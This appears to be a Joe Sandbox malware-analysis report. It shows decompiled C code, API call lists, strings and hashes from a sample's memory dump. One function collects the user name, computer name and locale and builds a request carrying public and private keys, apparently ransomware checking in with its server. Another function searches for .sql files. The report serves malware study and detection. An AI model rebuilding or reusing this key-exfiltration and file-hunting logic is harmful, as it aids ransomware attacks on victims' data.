Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: Close$ErrorLastOpenQueryValue
String ID:
API String ID: 2437438455-0
Opcode ID: ba44477a77963890287057f136f25e816ce8da7ff14de6058fc59eb92cc35e2f
Instruction ID: 96fb45f7232b76e22f797b477a1ab2c6a43de7373f09cda078c9853f66012361
Opcode Fuzzy Hash: ba44477a77963890287057f136f25e816ce8da7ff14de6058fc59eb92cc35e2f
Instruction Fuzzy Hash: C5017C3260111DFBCB109F95ED09DDBBB6CEB083A2B0040A6FD05D6110D7329A31AFE0

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC4BF0 Relevance: 3.0, APIs: 2, Instructions: 25
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			_entry_(intOrPtr _a8) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _t10;

				_v16 = 1;
				_v12 = _a8;
				_t10 = CreateThread(0, 0, E0FBC4950, 0, 0, 0); // executed
				_v8 = _t10;
				if(_v8 != 0) {
					FindCloseChangeNotification(_v8); // executed
				}
				return _v16;
			}

0x0fbc4bf6
0x0fbc4c00
0x0fbc4c1c
0x0fbc4c22
0x0fbc4c29
0x0fbc4c2f
0x0fbc4c2f
0x0fbc4c3b

APIs

CreateThread.KERNELBASE(00000000,00000000,0FBC4950,00000000,00000000,00000000), ref: 0FBC4C1C
FindCloseChangeNotification.KERNELBASE(00000000), ref: 0FBC4C2F

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: ChangeCloseCreateFindNotificationThread
String ID:
API String ID: 4060959955-0
Opcode ID: 07a0111f9cc1a7106def90078d7a7818bed7797395ff3c2b804ae898ddf48f79
Instruction ID: 9894517c40ac347b2dd621b07ba3af0984a6c421eaa1033b6ab56bffefb9d358
Opcode Fuzzy Hash: 07a0111f9cc1a7106def90078d7a7818bed7797395ff3c2b804ae898ddf48f79
Instruction Fuzzy Hash: 20F03934A4430CFBD710DFA0E81AB9EB774EB08B11F20819AEA017B2C0C6B56650CF84

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0FBC5880 Relevance: 87.9, APIs: 45, Strings: 5, Instructions: 416
stringmemoryencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			E0FBC5880(char __ecx, int __edx, BYTE* _a4, signed int _a8, long* _a12) {
				char _v295;
				char _v296;
				char _v404;
				char _v408;
				void* _v428;
				CHAR* _v432;
				int _v436;
				int _v440;
				char _v442;
				CHAR* _v444;
				short _v448;
				int _v452;
				char _v456;
				CHAR* _v464;
				int _v468;
				void* _v472;
				BYTE* _v476;
				WCHAR* _v480;
				WCHAR* _v484;
				void* _v488;
				void* _v492;
				short* _v496;
				CHAR* _v500;
				void* _v504;
				long _v508;
				CHAR* _v512;
				CHAR* _v528;
				CHAR* _t133;
				void* _t135;
				int _t145;
				void* _t148;
				int _t149;
				void* _t150;
				void* _t152;
				signed int _t159;
				signed int _t163;
				void* _t170;
				signed int _t172;
				CHAR* _t185;
				long _t189;
				intOrPtr _t199;
				int _t200;
				void _t202;
				int _t203;
				void _t204;
				int _t205;
				long _t213;
				void* _t219;
				short _t228;
				char* _t229;
				WCHAR* _t231;
				short _t233;
				CHAR* _t234;
				char _t235;
				void* _t238;
				long _t240;
				long _t241;
				void* _t243;
				void* _t245;
				short _t248;
				int _t249;
				void* _t255;
				CHAR* _t256;
				WCHAR* _t258;
				WCHAR* _t259;
				signed int _t261;
				CHAR* _t262;
				CHAR* _t263;
				signed int _t266;
				int _t267;
				void* _t268;
				long _t271;
				void* _t272;
				void* _t273;
				long _t279;
				int _t280;
				long _t281;
				void* _t282;
				CHAR* _t283;
				short _t284;

				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_v456 = __ecx;
				_v436 = __edx;
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(1);
				_push(__ecx);
				_push(1);
				E0FBC39F0( &_v404);
				E0FBC7330( &_v492, __edx);
				_t255 = E0FBC7140( &_v492);
				_t266 = _a8 + __edx;
				_t7 = _t266 + 8; // 0x8
				_t213 = _t255 + _t7 * 8 << 3;
				_t133 = VirtualAlloc(0, _t213, 0x3000, 0x40);
				_t248 = 0;
				_v512 = _t133;
				_v528 = _t133;
				_t228 = 0x30 + (_t255 + _t266 * 4) * 8;
				if(_t133 == 0 || _t228 >= _t213) {
					_v448 = _t248;
					_t256 = _t133;
				} else {
					_t256 =  &(_t133[_t228]);
					_v448 = _t133;
					_v444 = _t256;
					_t248 = _t228;
				}
				_t135 = 2 + _a8 * 8;
				if(_v428 == 0) {
					L7:
					_t229 = 0;
					_v432 = 0;
				} else {
					_t284 = _t248 + _t135;
					if(_t284 >= _t213) {
						goto L7;
					} else {
						_t229 = _t256;
						_v432 = _t256;
						_t256 =  &(_t256[_t135]);
						_t248 = _t284;
						_v444 = _t256;
					}
				}
				_t267 = _v440;
				if(_v428 == 0 || 2 + _t267 * 8 + _t248 >= _t213) {
					_t256 = 0;
					_v444 = 0;
				}
				if(_t229 == 0) {
					goto L53;
				} else {
					_t249 = _a8;
					_v436 = _t249 + _t249;
					CryptBinaryToStringA(_a4, _t249, 0x40000001, _t229,  &_v436);
					_v452 = _t267 + _t267;
					CryptBinaryToStringA(_v476, _t267, 0x40000001, _t256,  &_v452);
					_t145 = lstrlenA(_t256);
					_t271 = _t145 + lstrlenA(_v464) + 0x42;
					_t148 = VirtualAlloc(0, _t271, 0x3000, 0x40);
					_v472 = _t148;
					_v488 = _t148;
					_v492 = 0;
					_t149 = lstrlenA(_v464);
					_t231 = _v472;
					_t150 = _t149 + 1;
					if(_t231 == 0 || _t150 >= _t271) {
						_v484 = 0;
					} else {
						_v492 = _t150;
						_v488 = _t231 + _t150;
						_v484 = _t231;
					}
					_t152 = lstrlenA(_t256) + 1;
					if(_v472 == 0 || _t152 + _v492 >= _t271) {
						_v488 = 0;
					}
					_t272 = 0;
					if(lstrlenA(_v464) != 0) {
						_t245 = _v484;
						_t263 = _v464;
						_v492 = _t245;
						do {
							_t204 =  *((intOrPtr*)(_t272 + _t263));
							if(_t204 != 0xa && _t204 != 0xd) {
								 *_t245 = _t204;
								_v492 = _t245 + 1;
							}
							_t272 = _t272 + 1;
							_t205 = lstrlenA(_t263);
							_t245 = _v492;
						} while (_t272 < _t205);
						_t256 = _v476;
					}
					_t273 = 0;
					if(lstrlenA(_t256) != 0) {
						_t243 = _v488;
						_v492 = _t243;
						do {
							_t202 =  *((intOrPtr*)(_t273 + _t256));
							if(_t202 != 0xa && _t202 != 0xd) {
								 *_t243 = _t202;
								_v492 = _t243 + 1;
							}
							_t273 = _t273 + 1;
							_t203 = lstrlenA(_t256);
							_t243 = _v492;
						} while (_t273 < _t203);
					}
					_t258 = _v480;
					lstrcatW(_t258, L"action=call&");
					_t259 =  &(_t258[lstrlenW(_t258)]);
					E0FBC6F40( &_v440, _t259);
					lstrcatW(_t259, L"&pub_key=");
					_t159 = lstrlenW(_t259);
					MultiByteToWideChar(0xfde9, 0, _v488, 0xffffffff,  &(_t259[_t159]), lstrlenA(_v488));
					lstrcatW(_t259, L"&priv_key=");
					_t163 = lstrlenW(_t259);
					MultiByteToWideChar(0xfde9, 0, _v492, 0xffffffff,  &(_t259[_t163]), lstrlenA(_v492));
					lstrcatW(_t259, L"&version=2.3r");
					_t279 = (lstrlenW(_v484) << 4) + 0x12;
					_t219 = VirtualAlloc(0, _t279, 0x3000, 0x40);
					_v480 = _t219;
					_t170 = 2 + lstrlenW(_v484) * 8;
					if(_t219 == 0 || _t170 >= _t279) {
						_v492 = 0;
					} else {
						_v492 = _t219;
					}
					_t172 = lstrlenW(_v480);
					_t233 = "#shasj"; // 0x61687323
					_t261 = _t172;
					asm("movq xmm0, [0xfbcfc78]");
					_v448 = _t233;
					_t234 =  *0xfbcfc84; // 0x6a73
					_v444 = _t234;
					_t235 =  *0xfbcfc86; // 0x0
					asm("movq [esp+0x3c], xmm0");
					_v442 = _t235;
					_v296 = 0;
					E0FBC9010( &_v295, 0, 0xff);
					E0FBC5D70( &_v296,  &_v456, lstrlenA( &_v456));
					_t280 = _t261 + _t261;
					E0FBC5E20( &_v296, _v480, _t280);
					_t262 = _v492;
					_v468 = _t261 * 8;
					if(CryptBinaryToStringA(_v480, _t280, 0x40000001, _t262,  &_v468) == 0) {
						GetLastError();
					}
					_t105 = lstrlenA(_t262) + 2; // 0x2
					_t281 = _t105;
					_v504 = VirtualAlloc(0, _t281, 0x3000, 0x40);
					_t107 = lstrlenA(_t262) + 1; // 0x1
					_t238 = _t107;
					_t185 = _v504;
					if(_t185 == 0) {
						L40:
						_v500 = 0;
					} else {
						_v500 = _t185;
						if(_t238 >= _t281) {
							goto L40;
						}
					}
					_t282 = 0;
					if(lstrlenA(_t262) != 0) {
						_t241 = _v500;
						_v508 = _t241;
						do {
							_t199 =  *((intOrPtr*)(_t282 + _t262));
							if(_t199 != 0xa && _t199 != 0xd) {
								 *_t241 = _t199;
								_v508 = _t241 + 1;
							}
							_t282 = _t282 + 1;
							_t200 = lstrlenA(_t262);
							_t241 = _v508;
						} while (_t282 < _t200);
					}
					_t283 = _v500;
					MultiByteToWideChar(0xfde9, 0, _t283, 0xffffffff, _v496, lstrlenA(_t283));
					_v508 = 0;
					_t189 = E0FBC54A0(_t283,  &_v508, 1);
					if(_t189 != 0) {
						_t240 = _v508;
						if(_t240 != 0) {
							 *_a12 = _t240;
						}
						VirtualFree(_v504, 0, 0x8000);
						VirtualFree(_v492, 0, 0x8000);
						VirtualFree(_v488, 0, 0x8000);
						L53:
						_t268 = 1;
					} else {
						VirtualFree(_v504, _t189, 0x8000);
						VirtualFree(_v492, 0, 0x8000);
						VirtualFree(_v488, 0, 0x8000);
						_t268 = 0;
					}
				}
				VirtualFree(_v428, 0, 0x8000);
				E0FBC7C10( &_v408);
				return _t268;
			}

0x0fbc588f
0x0fbc5890
0x0fbc5892
0x0fbc5893
0x0fbc5898
0x0fbc589e
0x0fbc58a2
0x0fbc58a4
0x0fbc58a5
0x0fbc58a7
0x0fbc58a8
0x0fbc58aa
0x0fbc58ab
0x0fbc58ad
0x0fbc58ae
0x0fbc58b3
0x0fbc58b5
0x0fbc58b6
0x0fbc58bf
0x0fbc58c8
0x0fbc58d9
0x0fbc58db
0x0fbc58e4
0x0fbc58ea
0x0fbc58f0
0x0fbc58f6
0x0fbc58f8
0x0fbc58fc
0x0fbc5903
0x0fbc590c
0x0fbc5921
0x0fbc5925
0x0fbc5912
0x0fbc5912
0x0fbc5915
0x0fbc5919
0x0fbc591d
0x0fbc591d
0x0fbc592f
0x0fbc5936
0x0fbc594f
0x0fbc594f
0x0fbc5951
0x0fbc5938
0x0fbc5938
0x0fbc593d
0x00000000
0x0fbc593f
0x0fbc593f
0x0fbc5941
0x0fbc5945
0x0fbc5947
0x0fbc5949
0x0fbc5949
0x0fbc593d
0x0fbc595a
0x0fbc595e
0x0fbc596d
0x0fbc596f
0x0fbc596f
0x0fbc5975
0x00000000
0x0fbc597b
0x0fbc597b
0x0fbc5987
0x0fbc599a
0x0fbc599f
0x0fbc59b3
0x0fbc59bc
0x0fbc59d0
0x0fbc59d5
0x0fbc59df
0x0fbc59e3
0x0fbc59e7
0x0fbc59ef
0x0fbc59f1
0x0fbc59f5
0x0fbc59f8
0x0fbc5a0f
0x0fbc59fe
0x0fbc5a01
0x0fbc5a05
0x0fbc5a09
0x0fbc5a09
0x0fbc5a1a
0x0fbc5a20
0x0fbc5a2a
0x0fbc5a2a
0x0fbc5a36
0x0fbc5a3c
0x0fbc5a3e
0x0fbc5a42
0x0fbc5a46
0x0fbc5a50
0x0fbc5a50
0x0fbc5a55
0x0fbc5a5b
0x0fbc5a5e
0x0fbc5a5e
0x0fbc5a63
0x0fbc5a64
0x0fbc5a66
0x0fbc5a6a
0x0fbc5a6e
0x0fbc5a6e
0x0fbc5a73
0x0fbc5a79
0x0fbc5a7b
0x0fbc5a7f
0x0fbc5a83
0x0fbc5a83
0x0fbc5a88
0x0fbc5a8e
0x0fbc5a91
0x0fbc5a91
0x0fbc5a96
0x0fbc5a97
0x0fbc5a99
0x0fbc5a9d
0x0fbc5a83
0x0fbc5aa1
0x0fbc5ab1
0x0fbc5ac0
0x0fbc5ac4
0x0fbc5acf
0x0fbc5ad2
0x0fbc5af0
0x0fbc5afc
0x0fbc5aff
0x0fbc5b21
0x0fbc5b2d
0x0fbc5b47
0x0fbc5b57
0x0fbc5b59
0x0fbc5b5f
0x0fbc5b68
0x0fbc5b76
0x0fbc5b6e
0x0fbc5b6e
0x0fbc5b6e
0x0fbc5b7e
0x0fbc5b80
0x0fbc5b86
0x0fbc5b88
0x0fbc5b97
0x0fbc5b9b
0x0fbc5ba7
0x0fbc5bac
0x0fbc5bb5
0x0fbc5bbb
0x0fbc5bbf
0x0fbc5bc7
0x0fbc5be8
0x0fbc5bf1
0x0fbc5bff
0x0fbc5c0e
0x0fbc5c12
0x0fbc5c2e
0x0fbc5c30
0x0fbc5c30
0x0fbc5c40
0x0fbc5c40
0x0fbc5c4d
0x0fbc5c53
0x0fbc5c53
0x0fbc5c56
0x0fbc5c5c
0x0fbc5c66
0x0fbc5c66
0x0fbc5c5e
0x0fbc5c5e
0x0fbc5c64
0x00000000
0x00000000
0x0fbc5c64
0x0fbc5c6f
0x0fbc5c75
0x0fbc5c77
0x0fbc5c7b
0x0fbc5c80
0x0fbc5c80
0x0fbc5c85
0x0fbc5c8b
0x0fbc5c8e
0x0fbc5c8e
0x0fbc5c93
0x0fbc5c94
0x0fbc5c96
0x0fbc5c9a
0x0fbc5c80
0x0fbc5c9e
0x0fbc5cb4
0x0fbc5cc0
0x0fbc5cca
0x0fbc5cd4
0x0fbc5d07
0x0fbc5d0d
0x0fbc5d12
0x0fbc5d12
0x0fbc5d26
0x0fbc5d33
0x0fbc5d40
0x0fbc5d4a
0x0fbc5d4a
0x0fbc5cd6
0x0fbc5ce7
0x0fbc5cf4
0x0fbc5d01
0x0fbc5d03
0x0fbc5d03
0x0fbc5cd4
0x0fbc5d5a
0x0fbc5d60
0x0fbc5d6d

APIs

Part of subcall function 0FBC39F0: GetProcessHeap.KERNEL32(?,?,0FBC4637,00000000,?,00000000,00000000), ref: 0FBC3A8C

Part of subcall function 0FBC7330: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0FBC7357
Part of subcall function 0FBC7330: GetUserNameW.ADVAPI32(00000000,?), ref: 0FBC7368
Part of subcall function 0FBC7330: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0FBC7386
Part of subcall function 0FBC7330: GetComputerNameW.KERNEL32 ref: 0FBC7390
Part of subcall function 0FBC7330: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0FBC73B0
Part of subcall function 0FBC7330: wsprintfW.USER32 ref: 0FBC73F1
Part of subcall function 0FBC7330: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0FBC740E
Part of subcall function 0FBC7330: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0FBC7432
Part of subcall function 0FBC7330: RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,0FBC4640,?), ref: 0FBC7456
Part of subcall function 0FBC7330: RegCloseKey.ADVAPI32(00000000), ref: 0FBC7472

Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7192
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC719D
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC71B3
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC71BE
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC71D4
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC71DF
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC71F5
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(0FBC4966,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7200
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7216
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7221
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7237
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7242
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7261
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC726C

VirtualAlloc.KERNEL32(00000000,00000008,00003000,00000040,00000001,00000000,00000001,00000001,00000000,00000001), ref: 0FBC58F0
CryptBinaryToStringA.CRYPT32(00000000,00000000,40000001,00000000,?), ref: 0FBC599A
CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0FBC59B3
lstrlenA.KERNEL32(00000000), ref: 0FBC59BC
lstrlenA.KERNEL32(?), ref: 0FBC59C4
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 0FBC59D5
lstrlenA.KERNEL32(?), ref: 0FBC59EF
lstrlenA.KERNEL32(00000000), ref: 0FBC5A18
lstrlenA.KERNEL32(?), ref: 0FBC5A38
lstrlenA.KERNEL32(?), ref: 0FBC5A64
lstrlenA.KERNEL32(00000000), ref: 0FBC5A75
lstrlenA.KERNEL32(00000000), ref: 0FBC5A97
lstrcatW.KERNEL32(?,action=call&), ref: 0FBC5AB1
lstrlenW.KERNEL32(?), ref: 0FBC5ABA
lstrcatW.KERNEL32(?,&pub_key=), ref: 0FBC5ACF
lstrlenW.KERNEL32(?), ref: 0FBC5AD2
lstrlenA.KERNEL32(00000000), ref: 0FBC5ADB
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,772969A0,00000000), ref: 0FBC5AF0
lstrcatW.KERNEL32(?,&priv_key=), ref: 0FBC5AFC
lstrlenW.KERNEL32(?), ref: 0FBC5AFF
lstrlenA.KERNEL32(00000000), ref: 0FBC5B0C
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,772969A0,00000000), ref: 0FBC5B21
lstrcatW.KERNEL32(?,&version=2.3r), ref: 0FBC5B2D
lstrlenW.KERNEL32(?), ref: 0FBC5B39
VirtualAlloc.KERNEL32(00000000,-00000012,00003000,00000040), ref: 0FBC5B4D
lstrlenW.KERNEL32(?), ref: 0FBC5B5D
lstrlenW.KERNEL32(?), ref: 0FBC5B7E
_memset.LIBCMT ref: 0FBC5BC7
lstrlenA.KERNEL32(?), ref: 0FBC5BDA

Part of subcall function 0FBC5D70: _memset.LIBCMT ref: 0FBC5D9D

CryptBinaryToStringA.CRYPT32(?,-00000012,40000001,?,?), ref: 0FBC5C26
GetLastError.KERNEL32 ref: 0FBC5C30
lstrlenA.KERNEL32(?), ref: 0FBC5C37
VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040), ref: 0FBC5C46
lstrlenA.KERNEL32(?), ref: 0FBC5C51
lstrlenA.KERNEL32(?), ref: 0FBC5C71
lstrlenA.KERNEL32(?), ref: 0FBC5C94
lstrlenA.KERNEL32(00000000), ref: 0FBC5CA3
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00000000), ref: 0FBC5CB4
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FBC5CE7
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FBC5CF4
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FBC5D01
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FBC5D26
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FBC5D33
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FBC5D40
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FBC5D5A

Strings

&pub_key=, xrefs: 0FBC5AC9
#shasj, xrefs: 0FBC5B80
&priv_key=, xrefs: 0FBC5AF6
&version=2.3r, xrefs: 0FBC5B27
action=call&, xrefs: 0FBC5AAB

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$Alloc$Free$lstrcat$BinaryByteCharCryptMultiStringWide$Name_memset$CloseComputerErrorHeapLastOpenProcessQueryUserValuewsprintf
String ID: #shasj$&priv_key=$&pub_key=$&version=2.3r$action=call&
API String ID: 2781787645-472827701
Opcode ID: 2c83c2689cb65c2c5c10f742b612afc6482e88eda0af9a6b55422d3a3265696e
Instruction ID: 8ca30d3db2fa103cd527477c7f3ad3f359090349a24468e685995ad0d8441cd7
Opcode Fuzzy Hash: 2c83c2689cb65c2c5c10f742b612afc6482e88eda0af9a6b55422d3a3265696e
Instruction Fuzzy Hash: 7AE1CC71108305AFD720CF25EC80BABBBE9EF88754F04495CF585A7291D774A905CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC6A40 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 136
stringfilememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBC6A40(WCHAR* __ecx) {
				void* _v8;
				void* _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				long _v24;
				struct _WIN32_FIND_DATAW _v620;
				int _t38;
				struct _SECURITY_ATTRIBUTES* _t40;
				int _t50;
				WCHAR* _t52;
				intOrPtr _t53;
				void* _t54;
				WCHAR* _t57;
				long _t64;
				WCHAR* _t66;
				void* _t67;

				_t66 = __ecx;
				_v16 = __ecx;
				_t52 =  &(_t66[lstrlenW(__ecx)]);
				_v20 = _t52;
				lstrcatW(_t66, "*");
				_v8 = FindFirstFileW(_t66,  &_v620);
				 *_t52 = 0;
				_t53 = 0;
				do {
					if(lstrcmpW( &(_v620.cFileName), ".") == 0 || lstrcmpW( &(_v620.cFileName), L"..") == 0) {
						goto L20;
					} else {
						lstrcatW(_t66,  &(_v620.cFileName));
						_t38 = lstrlenW(_t66);
						_t10 = _t38 - 1; // -1
						_t57 =  &(_t66[_t10]);
						if(_t38 == 0) {
							L18:
							_t53 = 0;
							goto L19;
						} else {
							while( *_t57 != 0x2e) {
								_t57 = _t57 - 2;
								_t38 = _t38 - 1;
								if(_t38 != 0) {
									continue;
								}
								break;
							}
							if(_t38 == 0) {
								goto L18;
							} else {
								_t40 = lstrcmpW(_t57, L".sql");
								if(_t40 != 0) {
									goto L18;
								} else {
									_t54 = CreateFileW(_t66, 0x80000000, 1, _t40, 3, _t40, _t40);
									_t64 = GetFileSize(_t54, 0);
									_v12 = 0;
									if(_t64 < 0x40000000) {
										_t67 = VirtualAlloc(0, _t64, 0x3000, 4);
										if(_t67 != 0) {
											if(ReadFile(_t54, _t67, _t64,  &_v24, 0) != 0 && E0FBC8100(_t67, "*******************") != 0) {
												_t50 = lstrlenA("*******************");
												_t15 = _t67 + 1; // 0x1
												_v12 = E0FBC69E0(_t15 + _t50);
											}
											VirtualFree(_t67, 0, 0x8000);
										}
										_t66 = _v16;
									}
									CloseHandle(_t54);
									_t53 = _v12;
									if(_t53 == 0) {
										L19:
										 *_v20 = 0;
										goto L20;
									}
								}
							}
						}
					}
					break;
					L20:
				} while (FindNextFileW(_v8,  &_v620) != 0);
				FindClose(_v8);
				return _t53;
			}

0x0fbc6a4b
0x0fbc6a4f
0x0fbc6a5e
0x0fbc6a61
0x0fbc6a64
0x0fbc6a7e
0x0fbc6a83
0x0fbc6a86
0x0fbc6a90
0x0fbc6aa0
0x00000000
0x0fbc6abc
0x0fbc6ac4
0x0fbc6acb
0x0fbc6ad1
0x0fbc6ad4
0x0fbc6ad9
0x0fbc6ba8
0x0fbc6ba8
0x00000000
0x0fbc6ae0
0x0fbc6ae0
0x0fbc6ae6
0x0fbc6ae9
0x0fbc6aea
0x00000000
0x00000000
0x00000000
0x0fbc6aea
0x0fbc6aee
0x00000000
0x0fbc6af4
0x0fbc6afa
0x0fbc6afe
0x00000000
0x0fbc6b04
0x0fbc6b17
0x0fbc6b22
0x0fbc6b26
0x0fbc6b2f
0x0fbc6b40
0x0fbc6b44
0x0fbc6b57
0x0fbc6b6e
0x0fbc6b74
0x0fbc6b7e
0x0fbc6b7e
0x0fbc6b89
0x0fbc6b89
0x0fbc6b8f
0x0fbc6b8f
0x0fbc6b93
0x0fbc6b99
0x0fbc6b9e
0x0fbc6baa
0x0fbc6baf
0x00000000
0x0fbc6baf
0x0fbc6b9e
0x0fbc6afe
0x0fbc6aee
0x0fbc6ad9
0x00000000
0x0fbc6bb2
0x0fbc6bc2
0x0fbc6bcd
0x0fbc6bdb

APIs

lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0FBC6A52
lstrcatW.KERNEL32(00000000,0FBCFEC4), ref: 0FBC6A64
FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0FBC6A72
lstrcmpW.KERNEL32(?,0FBCFEC8,?,?), ref: 0FBC6A9C
lstrcmpW.KERNEL32(?,0FBCFECC,?,?), ref: 0FBC6AB2
lstrcatW.KERNEL32(00000000,?), ref: 0FBC6AC4
lstrlenW.KERNEL32(00000000,?,?), ref: 0FBC6ACB
lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0FBC6AFA
CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0FBC6B11
GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0FBC6B1C
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0FBC6B3A
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0FBC6B4F
lstrlenA.KERNEL32(*******************,?,?), ref: 0FBC6B6E
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0FBC6B89
CloseHandle.KERNEL32(00000000,?,?), ref: 0FBC6B93
FindNextFileW.KERNEL32(?,?,?,?), ref: 0FBC6BBC
FindClose.KERNEL32(?,?,?), ref: 0FBC6BCD

Strings

*******************, xrefs: 0FBC6B59, 0FBC6B69
.sql, xrefs: 0FBC6AF4

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: File$Findlstrcmplstrlen$CloseVirtuallstrcat$AllocCreateFirstFreeHandleNextReadSize
String ID: *******************$.sql
API String ID: 3616287438-58436570
Opcode ID: 37504927479e82b3bb79914cfb5ab0ac66e3c037fccc24e5156cd091e500d72a
Instruction ID: 43998a4b7b1806e3bd6afa131c5ef269e013f442e5a5be2c8d07d1e4c094a08c
Opcode Fuzzy Hash: 37504927479e82b3bb79914cfb5ab0ac66e3c037fccc24e5156cd091e500d72a
